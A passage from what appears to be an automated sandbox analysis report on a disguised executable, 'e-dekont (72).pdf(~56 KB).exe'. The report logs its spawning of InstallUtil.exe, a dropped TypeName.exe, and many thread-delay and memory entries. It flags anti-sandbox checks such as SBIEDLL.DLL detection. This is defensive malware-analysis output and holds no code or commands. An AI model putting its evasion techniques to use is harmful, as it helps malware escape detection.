              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA387F rdtsc 4_2_06DA387F
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598340Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598213Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598103Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597993Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596623Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596182Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595462Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595195Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599559Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599308Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599185Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598732Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598407Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598282Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeWindow / User API: threadDelayed 1164Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeWindow / User API: threadDelayed 3483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8088Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeWindow / User API: threadDelayed 2506Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeWindow / User API: threadDelayed 1391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7252Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2562Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 5676Thread sleep count: 1164 > 30Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 5676Thread sleep count: 3483 > 30Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99452s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98684s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98574s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98248s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98130s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -97984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -97819s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -31359464925306218s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5008Thread sleep count: 1750 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5008Thread sleep count: 8088 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598340s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598213s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598103s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597993s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597313s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597188s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596623s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596515s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596297s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596182s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595462s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595344s >= -30000sJump to behavior
